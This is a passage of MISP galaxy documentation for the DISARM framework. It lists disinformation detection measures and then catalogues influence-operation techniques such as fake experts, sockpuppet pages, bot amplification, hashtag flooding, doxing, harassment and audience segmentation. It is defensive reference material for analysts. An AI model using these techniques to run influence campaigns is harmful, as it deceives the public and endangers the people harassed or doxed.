Outpace Competitor Intelligence Capabilities

Develop an intelligence-based understanding of foreign actors’ motivations, psychologies, and societal and geopolitical contexts. Leverage artificial intelligence to identify patterns and infer competitors’ intent

The tag is: misp-galaxy:disarm-detections="Outpace Competitor Intelligence Capabilities"

Table 1244. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00086.md

Improve Indications and Warning

United States has not adequately adapted its information indicators and thresholds for warning policymakers to account for grey zone tactics. Competitors have undertaken a marked shift to slow-burn, deceptive, non-military, and indirect challenges to U.S. interests. Relative to traditional security indicators and warnings, these are more numerous and harder to detect and make it difficult for analysts to infer intent.

The tag is: misp-galaxy:disarm-detections="Improve Indications and Warning"

Table 1245. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00087.md

Revitalise an “active measures working group,”

Recognise campaigns from weak signals, including rivals’ intent, capability, impact, interactive effects, and impact on U.S. interests…​ focus on adversarial covert action aspects of campaigning.

The tag is: misp-galaxy:disarm-detections="Revitalise an “active measures working group,”"

Table 1246. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00088.md

target/name/flag "grey zone" website content

"Grey zone" is second level of content producers and circulators, composed of outlets with uncertain attribution. This category covers conspiracy websites, far-right or far-left websites, news aggregators, and data dump websites

The tag is: misp-galaxy:disarm-detections="target/name/flag "grey zone" website content"

Table 1247. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00089.md

Match Punitive Tools with Third-Party Inducements

Bring private sector and civil society into accord on U.S. interests

The tag is: misp-galaxy:disarm-detections="Match Punitive Tools with Third-Party Inducements"

Table 1248. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00090.md

Partner to develop analytic methods & tools

This might include working with relevant technology firms to ensure that contracted analytic support is available. Contracted support is reportedly valuable because technology to monitor social media data is continually evolving, and such firms can provide the expertise to help identify and analyse trends, and they can more effectively stay abreast of the changing systems and develop new models as they are required

The tag is: misp-galaxy:disarm-detections="Partner to develop analytic methods & tools"

Table 1249. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00091.md

daylight

Warn social media companies about an ongoing campaign (e.g. antivax sites). Anyone with datasets or data summaries can help with this

The tag is: misp-galaxy:disarm-detections="daylight"

Table 1250. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00092.md

S4d detection and re-allocation approaches

S4D is a way to separate out different speakers in text, audio.

The tag is: misp-galaxy:disarm-detections="S4d detection and re-allocation approaches"

Table 1251. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00093.md

Registries alert when large batches of newsy URLs get registered together

The tag is: misp-galaxy:disarm-detections="Registries alert when large batches of newsy URLs get registered together"

Table 1252. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00094.md

Fact checking

Process suspicious artefacts, narratives, and incidents

The tag is: misp-galaxy:disarm-detections="Fact checking"

Table 1253. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00095.md

Techniques

DISARM is a framework designed for describing and understanding disinformation incidents..

Techniques is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

Facilitate State Propaganda

Organise citizens around pro-state messaging. Coordinate paid or volunteer groups to push state propaganda.

The tag is: misp-galaxy:disarm-techniques="Facilitate State Propaganda"

Table 1254. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0002.md

Leverage Existing Narratives

Use or adapt existing narrative themes, where narratives are the baseline stories of a target audience. Narratives form the bedrock of our worldviews. New information is understood through a process firmly grounded in this bedrock. If new information is not consitent with the prevailing narratives of an audience, it will be ignored. Effective campaigns will frame their misinformation in the context of these narratives. Highly effective campaigns will make extensive use of audience-appropriate archetypes and meta-narratives throughout their content creation and amplifiction practices.

The tag is: misp-galaxy:disarm-techniques="Leverage Existing Narratives"

Table 1255. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0003.md

Develop Competing Narratives

Advance competing narratives connected to same issue ie: on one hand deny incident while at same time expresses dismiss. Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centred on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on. These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: misp-galaxy:disarm-techniques="Develop Competing Narratives"

Table 1256. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0004.md

Create Inauthentic Social Media Pages and Groups

Create key social engineering assets needed to amplify content, manipulate algorithms, fool public and/or specific incident/campaign targets. Computational propaganda depends substantially on false perceptions of credibility and acceptance. By creating fake users and groups with a variety of interests and commitments, attackers can ensure that their messages both come from trusted sources and appear more widely adopted than they actually are.

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic Social Media Pages and Groups"

Table 1257. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0007.md

Create Fake Experts

Stories planted or promoted in computational propaganda operations often make use of experts fabricated from whole cloth, sometimes specifically for the story itself.

The tag is: misp-galaxy:disarm-techniques="Create Fake Experts"

Table 1258. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0009.md

Utilise Academic/Pseudoscientific Justifications

Utilise Academic/Pseudoscientific Justifications

The tag is: misp-galaxy:disarm-techniques="Utilise Academic/Pseudoscientific Justifications"

Table 1259. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0009.001.md

Cultivate Ignorant Agents

Cultivate propagandists for a cause, the goals of which are not fully comprehended, and who are used cynically by the leaders of the cause. Independent actors use social media and specialised web sites to strategically reinforce and spread messages compatible with their own. Their networks are infiltrated and used by state media disinformation organisations to amplify the state’s own disinformation strategies against target populations. Many are traffickers in conspiracy theories or hoaxes, unified by a suspicion of Western governments and mainstream media. Their narratives, which appeal to leftists hostile to globalism and military intervention and nationalists against immigration, are frequently infiltrated and shaped by state-controlled trolls and altered news items from agencies such as RT and Sputnik. Also know as "useful idiots" or "unwitting agents".

The tag is: misp-galaxy:disarm-techniques="Cultivate Ignorant Agents"

Table 1260. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0010.md

Create Inauthentic Websites

Create media assets to support inauthentic organisations (e.g. think tank), people (e.g. experts) and/or serve as sites to distribute malware/launch phishing operations.

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic Websites"

Table 1261. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0013.md

Prepare Fundraising Campaigns

Fundraising campaigns refer to an influence operation’s systematic effort to seek financial support for a charity, cause, or other enterprise using online activities that further promote operation information pathways while raising a profit. Many influence operations have engaged in crowdfunding services on platforms including Tipee, Patreon, and GoFundMe. An operation may use its previously prepared fundraising campaigns (see: Develop Information Pathways) to promote operation messaging while raising money to support its activities.

The tag is: misp-galaxy:disarm-techniques="Prepare Fundraising Campaigns"

Table 1262. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0014.md

Raise Funds from Malign Actors

Raising funds from malign actors may include contributions from foreign agents, cutouts or proxies, shell companies, dark money groups, etc.

The tag is: misp-galaxy:disarm-techniques="Raise Funds from Malign Actors"

Table 1263. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0014.001.md

Raise Funds from Ignorant Agents

Raising funds from ignorant agents may include scams, donations intended for one stated purpose but then used for another, etc.

The tag is: misp-galaxy:disarm-techniques="Raise Funds from Ignorant Agents"

Table 1264. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0014.002.md

Create Hashtags and Search Artefacts

Create one or more hashtags and/or hashtag groups. Many incident-based campaigns will create hashtags to promote their fabricated event. Creating a hashtag for an incident can have two important effects: 1. Create a perception of reality around an event. Certainly only "real" events would be discussed in a hashtag. After all, the event has a name!, and 2. Publicise the story more widely through trending lists and search behaviour. Asset needed to direct/control/manage "conversation" connected to launching new incident/campaign with new hashtag for applicable social media sites).

The tag is: misp-galaxy:disarm-techniques="Create Hashtags and Search Artefacts"

Table 1265. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0015.md

Create Clickbait

Create attention grabbing headlines (outrage, doubt, humour) required to drive traffic & engagement. This is a key asset.

The tag is: misp-galaxy:disarm-techniques="Create Clickbait"

Table 1266. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0016.md

Conduct Fundraising

Fundraising campaigns refer to an influence operation’s systematic effort to seek financial support for a charity, cause, or other enterprise using online activities that further promote operation information pathways while raising a profit. Many influence operations have engaged in crowdfunding services166 on platforms including Tipee, Patreon, and GoFundMe. An operation may use its previously prepared fundraising campaigns to promote operation messaging while raising money to support its activities.

The tag is: misp-galaxy:disarm-techniques="Conduct Fundraising"

Table 1267. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0017.md

Conduct Crowdfunding Campaigns

An influence operation may Conduct Crowdfunding Campaigns on platforms such as GoFundMe, GiveSendGo, Tipeee, Patreon, etc.

The tag is: misp-galaxy:disarm-techniques="Conduct Crowdfunding Campaigns"

Table 1268. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0017.001.md

Purchase Targeted Advertisements

Create or fund advertisements targeted at specific populations

The tag is: misp-galaxy:disarm-techniques="Purchase Targeted Advertisements"

Table 1269. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0018.md

Trial Content

Iteratively test incident performance (messages, content etc), e.g. A/B test headline/content enagagement metrics; website and/or funding campaign conversion rates

The tag is: misp-galaxy:disarm-techniques="Trial Content"

Table 1270. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0020.md

Leverage Conspiracy Theory Narratives

"Conspiracy narratives" appeal to the human desire for explanatory order, by invoking the participation of poweful (often sinister) actors in pursuit of their own political goals. These narratives are especially appealing when an audience is low-information, marginalised or otherwise inclined to reject the prevailing explanation. Conspiracy narratives are an important component of the "firehose of falsehoods" model.

The tag is: misp-galaxy:disarm-techniques="Leverage Conspiracy Theory Narratives"

Table 1271. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0022.md

Amplify Existing Conspiracy Theory Narratives

An influence operation may amplify an existing conspiracy theory narrative that aligns with its incident or campaign goals. By amplifying existing conspiracy theory narratives, operators can leverage the power of the existing communities that support and propagate those theories without needing to expend resources creating new narratives or building momentum and buy in around new narratives.

The tag is: misp-galaxy:disarm-techniques="Amplify Existing Conspiracy Theory Narratives"

Table 1272. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0022.001.md

Develop Original Conspiracy Theory Narratives

While this requires more resources than amplifying existing conspiracy theory narratives, an influence operation may develop original conspiracy theory narratives in order to achieve greater control and alignment over the narrative and their campaign goals. Prominent examples include the USSR’s Operation INFEKTION disinformation campaign run by the KGB in the 1980s to plant the idea that the United States had invented HIV/AIDS as part of a biological weapons research project at Fort Detrick, Maryland. More recently, Fort Detrick featured prominently in a new conspiracy theory narratives around the origins of the COVID-19 outbreak and pandemic.

The tag is: misp-galaxy:disarm-techniques="Develop Original Conspiracy Theory Narratives"

Table 1273. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0022.002.md

Distort Facts

Change, twist, or exaggerate existing facts to construct a narrative that differs from reality. Examples: images and ideas can be distorted by being placed in an improper content

The tag is: misp-galaxy:disarm-techniques="Distort Facts"

Table 1274. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0023.md

Reframe Context

Reframing context refers to removing an event from its surrounding context to distort its intended meaning. Rather than deny that an event occurred, reframing context frames an event in a manner that may lead the target audience to draw a different conclusion about its intentions.

The tag is: misp-galaxy:disarm-techniques="Reframe Context"

Table 1275. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0023.001.md

Edit Open-Source Content

An influence operation may edit open-source content, such as collaborative blogs or encyclopaedias, to promote its narratives on outlets with existing credibility and audiences. Editing open-source content may allow an operation to post content on platforms without dedicating resources to the creation and maintenance of its own assets.

The tag is: misp-galaxy:disarm-techniques="Edit Open-Source Content"

Table 1276. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0023.002.md

Online Polls

Create fake online polls, or manipulate existing online polls. Data gathering tactic to target those who engage, and potentially their networks of friends/followers as well

The tag is: misp-galaxy:disarm-techniques="Online Polls"

Table 1277. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0029.md

Bait Influencer

Influencers are people on social media platforms who have large audiences. 

Threat Actors can try to trick Influencers such as celebrities, journalists, or local leaders who aren’t associated with their campaign into amplifying campaign content. This gives them access to the Influencer’s audience without having to go through the effort of building it themselves, and it helps legitimise their message by associating it with the Influencer, benefitting from their audience’s trust in them.

The tag is: misp-galaxy:disarm-techniques="Bait Influencer"

Table 1278. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0039.md

Demand Insurmountable Proof

Campaigns often leverage tactical and informational asymmetries on the threat surface, as seen in the Distort and Deny strategies, and the "firehose of misinformation". Specifically, conspiracy theorists can be repeatedly wrong, but advocates of the truth need to be perfect. By constantly escalating demands for proof, propagandists can effectively leverage this asymmetry while also priming its future use, often with an even greater asymmetric advantage. The conspiracist is offered freer rein for a broader range of "questions" while the truth teller is burdened with higher and higher standards of proof.

The tag is: misp-galaxy:disarm-techniques="Demand Insurmountable Proof"

Table 1279. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0040.md

Seed Kernel of Truth

Wrap lies or altered context/facts around truths. Influence campaigns pursue a variety of objectives with respect to target audiences, prominent among them: 1. undermine a narrative commonly referenced in the target audience; or 2. promote a narrative less common in the target audience, but preferred by the attacker. In both cases, the attacker is presented with a heavy lift. They must change the relative importance of various narratives in the interpretation of events, despite contrary tendencies. When messaging makes use of factual reporting to promote these adjustments in the narrative space, they are less likely to be dismissed out of hand; when messaging can juxtapose a (factual) truth about current affairs with the (abstract) truth explicated in these narratives, propagandists can undermine or promote them selectively. Context matters.

The tag is: misp-galaxy:disarm-techniques="Seed Kernel of Truth"

Table 1280. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0042.md

Chat Apps

Direct messaging via chat app is an increasing method of delivery. These messages are often automated and new delivery and storage methods make them anonymous, viral, and ephemeral. This is a difficult space to monitor, but also a difficult space to build acclaim or notoriety.

The tag is: misp-galaxy:disarm-techniques="Chat Apps"

Table 1281. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0043.md

Use Encrypted Chat Apps

Examples include Signal, WhatsApp, Discord, Wire, etc.

The tag is: misp-galaxy:disarm-techniques="Use Encrypted Chat Apps"

Table 1282. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0043.001.md

Use Unencrypted Chats Apps

Examples include SMS, etc.

The tag is: misp-galaxy:disarm-techniques="Use Unencrypted Chats Apps"

Table 1283. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0043.002.md

Seed Distortions

Try a wide variety of messages in the early hours surrounding an incident or event, to give a misleading account or impression.

The tag is: misp-galaxy:disarm-techniques="Seed Distortions"

Table 1284. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0044.md

Use Fake Experts

Use the fake experts that were set up during Establish Legitimacy. Pseudo-experts are disposable assets that often appear once and then disappear. Give "credility" to misinformation. Take advantage of credential bias

The tag is: misp-galaxy:disarm-techniques="Use Fake Experts"

Table 1285. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0045.md

Use Search Engine Optimisation

Manipulate content engagement metrics (ie: Reddit & Twitter) to influence/impact news search results (e.g. Google), also elevates RT & Sputnik headline into Google news alert emails. aka "Black-hat SEO"

The tag is: misp-galaxy:disarm-techniques="Use Search Engine Optimisation"

Table 1286. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0046.md

Censor Social Media as a Political Force

Use political influence or the power of state to stop critical social media comments. Government requested/driven content take downs (see Google Transperancy reports).

The tag is: misp-galaxy:disarm-techniques="Censor Social Media as a Political Force"

Table 1287. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0047.md

Harass

Threatening or harassing believers of opposing narratives refers to the use of intimidation techniques, including cyberbullying and doxing, to discourage opponents from voicing their dissent. An influence operation may threaten or harass believers of the opposing narratives to deter individuals from posting or proliferating conflicting content.

The tag is: misp-galaxy:disarm-techniques="Harass"

Table 1288. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.md

Boycott/"Cancel" Opponents

Cancel culture refers to the phenomenon in which individuals collectively refrain from supporting an individual, organisation, business, or other entity, usually following a real or falsified controversy. An influence operation may exploit cancel culture by emphasising an adversary’s problematic or disputed behaviour and presenting its own content as an alternative.

The tag is: misp-galaxy:disarm-techniques="Boycott/"Cancel" Opponents"

Table 1289. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.001.md

Harass People Based on Identities

Examples include social identities like gender, sexuality, race, ethnicity, religion, ability, nationality, etc. as well as roles and occupations like journalist or activist.

The tag is: misp-galaxy:disarm-techniques="Harass People Based on Identities"

Table 1290. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.002.md

Threaten to Dox

Doxing refers to online harassment in which individuals publicly release private information about another individual, including names, addresses, employment information, pictures, family members, and other sensitive information. An influence operation may dox its opposition to encourage individuals aligned with operation narratives to harass the doxed individuals themselves or otherwise discourage the doxed individuals from posting or proliferating conflicting content.

The tag is: misp-galaxy:disarm-techniques="Threaten to Dox"

Table 1291. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.003.md

Dox

Doxing refers to online harassment in which individuals publicly release private information about another individual, including names, addresses, employment information, pictures, family members, and other sensitive information. An influence operation may dox its opposition to encourage individuals aligned with operation narratives to harass the doxed individuals themselves or otherwise discourage the doxed individuals from posting or proliferating conflicting content.

The tag is: misp-galaxy:disarm-techniques="Dox"

Table 1292. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.004.md

Flood Information Space

Flooding sources of information (e.g. Social Media feeds) with a high volume of inauthentic content.

This can be done to control/shape online conversations, drown out opposing points of view, or make it harder to find legitimate information. 

Bots and/or patriotic trolls are effective tools to achieve this effect.

This Technique previously used the name Flooding the Information Space.

The tag is: misp-galaxy:disarm-techniques="Flood Information Space"

Table 1293. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.md

Trolls Amplify and Manipulate

Use trolls to amplify narratives and/or manipulate narratives. Fake profiles/sockpuppets operating to support individuals/narratives from the entire political spectrum (left/right binary). Operating with increased emphasis on promoting local content and promoting real Twitter users generating their own, often divisive political content, as it’s easier to amplify existing content than create new/original content. Trolls operate where ever there’s a socially divisive issue (issues that can/are be politicized).

The tag is: misp-galaxy:disarm-techniques="Trolls Amplify and Manipulate"

Table 1294. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.001.md

Flood Existing Hashtag

Hashtags can be used by communities to collate information they post about particular topics (such as their interests, or current events) and users can find communities to join by exploring hashtags they’re interested in. 

Threat actors can flood an existing hashtag to try to ruin hashtag functionality, posting content unrelated to the hashtag alongside it, making it a less reliable source of relevant information. They may also try to flood existing hashtags with campaign content, with the intent of maximising exposure to users.

This Technique covers cases where threat actors flood existing hashtags with campaign content.

This Technique covers behaviours previously documented by T0019.002: Hijack Hashtags, which has since been deprecated. This Technique was previously called Hijack Existing Hashtag.

The tag is: misp-galaxy:disarm-techniques="Flood Existing Hashtag"

Table 1295. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.002.md

Bots Amplify via Automated Forwarding and Reposting

Automated forwarding and reposting refer to the proliferation of operation content using automated means, such as artificial intelligence or social media bots. An influence operation may use automated activity to increase content exposure without dedicating the resources, including personnel and time, traditionally required to forward and repost content. Use bots to amplify narratives above algorithm thresholds. Bots are automated/programmed profiles designed to amplify content (ie: automatically retweet or like) and give appearance it’s more "popular" than it is. They can operate as a network, to function in a coordinated/orchestrated manner. In some cases (more so now) they are an inexpensive/disposable assets used for minimal deployment as bot detection tools improve and platforms are more responsive.

The tag is: misp-galaxy:disarm-techniques="Bots Amplify via Automated Forwarding and Reposting"

Table 1296. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.003.md

Utilise Spamoflauge

Spamoflauge refers to the practice of disguising spam messages as legitimate. Spam refers to the use of electronic messaging systems to send out unrequested or unwanted messages in bulk. Simple methods of spamoflauge include replacing letters with numbers to fool keyword-based email spam filters, for example, "you’ve w0n our jackp0t!". Spamoflauge may extend to more complex techniques such as modifying the grammar or word choice of the language, casting messages as images which spam detectors cannot automatically read, or encapsulating messages in password protected attachments, such as .pdf or .zip files. Influence operations may use spamoflauge to avoid spam filtering systems and increase the likelihood of the target audience receiving operation messaging.

The tag is: misp-galaxy:disarm-techniques="Utilise Spamoflauge"

Table 1297. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.004.md

Conduct Swarming

Swarming refers to the coordinated use of accounts to overwhelm the information space with operation content. Unlike information flooding, swarming centres exclusively around a specific event or actor rather than a general narrative. Swarming relies on “horizontal communication” between information assets rather than a top-down, vertical command-and-control approach.

The tag is: misp-galaxy:disarm-techniques="Conduct Swarming"

Table 1298. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.005.md

Conduct Keyword Squatting

Keyword squatting refers to the creation of online content, such as websites, articles, or social media accounts, around a specific search engine-optimized term to overwhelm the search results of that term. An influence may keyword squat to increase content exposure to target audience members who query the exploited term in a search engine and manipulate the narrative around the term.

The tag is: misp-galaxy:disarm-techniques="Conduct Keyword Squatting"

Table 1299. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.006.md

Inauthentic Sites Amplify News and Narratives

Inauthentic sites circulate cross-post stories and amplify narratives. Often these sites have no masthead, bylines or attribution.

The tag is: misp-galaxy:disarm-techniques="Inauthentic Sites Amplify News and Narratives"

Table 1300. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.007.md

Generate Information Pollution

Information Pollution occurs when threat actors attempt to ruin a source of information by flooding it with lots of inauthentic or unreliable content, intending to make it harder for legitimate users to find the information they’re looking for. 

This subtechnique’s objective is to reduce exposure to target information, rather than promoting exposure to campaign content, for which the parent technique T0049 can be used. 

Analysts will need to infer what the motive for flooding an information space was when deciding whether to use T0049 or T0049.008 to tag a case when an information space is flooded. If such inference is not possible, default to T0049.

This Technique previously used the ID T0019.

The tag is: misp-galaxy:disarm-techniques="Generate Information Pollution"

Table 1301. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.008.md

Organise Events

Coordinate and promote real-world events across media platforms, e.g. rallies, protests, gatherings in support of incident narratives.

The tag is: misp-galaxy:disarm-techniques="Organise Events"

Table 1302. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0057.md

Pay for Physical Action

Paying for physical action occurs when an influence operation pays individuals to act in the physical realm. An influence operation may pay for physical action to create specific situations and frame them in a way that supports operation narratives, for example, paying a group of people to burn a car to later post an image of the burning car and frame it as an act of protest.

The tag is: misp-galaxy:disarm-techniques="Pay for Physical Action"

Table 1303. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0057.001.md

Conduct Symbolic Action

Symbolic action refers to activities specifically intended to advance an operation’s narrative by signalling something to the audience, for example, a military parade supporting a state’s narrative of military superiority. An influence operation may use symbolic action to create falsified evidence supporting operation narratives in the physical information space.

The tag is: misp-galaxy:disarm-techniques="Conduct Symbolic Action"

Table 1304. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0057.002.md

Play the Long Game

Play the long game refers to two phenomena: 1. To plan messaging and allow it to grow organically without conducting your own amplification. This is methodical and slow and requires years for the message to take hold 2. To develop a series of seemingly disconnected messaging narratives that eventually combine into a new narrative.

The tag is: misp-galaxy:disarm-techniques="Play the Long Game"

Table 1305. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0059.md

Continue to Amplify

continue narrative or message amplification after the main incident work has finished

The tag is: misp-galaxy:disarm-techniques="Continue to Amplify"

Table 1306. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0060.md

Sell Merchandise

Sell mechandise refers to getting the message or narrative into physical space in the offline world while making money

The tag is: misp-galaxy:disarm-techniques="Sell Merchandise"

Table 1307. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0061.md

Prepare Physical Broadcast Capabilities

Create or coopt broadcast capabilities (e.g. TV, radio etc).

The tag is: misp-galaxy:disarm-techniques="Prepare Physical Broadcast Capabilities"

Table 1308. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0065.md

Degrade Adversary

Plan to degrade an adversary’s image or ability to act. This could include preparation and use of harmful information about the adversary’s actions or reputation.

The tag is: misp-galaxy:disarm-techniques="Degrade Adversary"

Table 1309. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0066.md

Respond to Breaking News Event or Active Crisis

Media attention on a story or event is heightened during a breaking news event, where unclear facts and incomplete information increase speculation, rumours, and conspiracy theories, which are all vulnerable to manipulation.

The tag is: misp-galaxy:disarm-techniques="Respond to Breaking News Event or Active Crisis"

Table 1310. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0068.md

Segment Audiences

Create audience segmentations by features of interest to the influence campaign, including political affiliation, geographic location, income, demographics, and psychographics.

The tag is: misp-galaxy:disarm-techniques="Segment Audiences"

Table 1311. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.md

Geographic Segmentation

An influence operation may target populations in a specific geographic location, such as a region, state, or city. An influence operation may use geographic segmentation to Create Localised Content (see: Establish Legitimacy).

The tag is: misp-galaxy:disarm-techniques="Geographic Segmentation"

Table 1312. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.001.md

Demographic Segmentation

An influence operation may target populations based on demographic segmentation, including age, gender, and income. Demographic segmentation may be useful for influence operations aiming to change state policies that affect a specific population sector. For example, an influence operation attempting to influence Medicare funding in the United States would likely target U.S. voters over 65 years of age.

The tag is: misp-galaxy:disarm-techniques="Demographic Segmentation"

Table 1313. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.002.md

Economic Segmentation

An influence operation may target populations based on their income bracket, wealth, or other financial or economic division.

The tag is: misp-galaxy:disarm-techniques="Economic Segmentation"

Table 1314. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.003.md

Psychographic Segmentation

An influence operation may target populations based on psychographic segmentation, which uses audience values and decision-making processes. An operation may individually gather psychographic data with its own surveys or collection tools or externally purchase data from social media companies or online surveys, such as personality quizzes.

The tag is: misp-galaxy:disarm-techniques="Psychographic Segmentation"

Table 1315. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.004.md

Political Segmentation

An influence operation may target populations based on their political affiliations, especially when aiming to manipulate voting or change policy.

The tag is: misp-galaxy:disarm-techniques="Political Segmentation"

Table 1316. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.005.md

Determine Target Audiences

Determining the target audiences (segments of the population) who will receive campaign narratives and artefacts intended to achieve the strategic ends.

The tag is: misp-galaxy:disarm-techniques="Determine Target Audiences"

Table 1317. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0073.md

Determine Strategic Ends

These are the long-term end-states the campaign aims to bring about. They typically involve an advantageous position vis-a-vis competitors in terms of power or influence. The strategic goal may be to improve or simply to hold one’s position. Competition occurs in the public sphere in the domains of war, diplomacy, politics, economics, and ideology, and can play out between armed groups, nation-states, political parties, corporations, interest groups, or individuals.

The tag is: misp-galaxy:disarm-techniques="Determine Strategic Ends"

Table 1318. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.md

Geopolitical Advantage

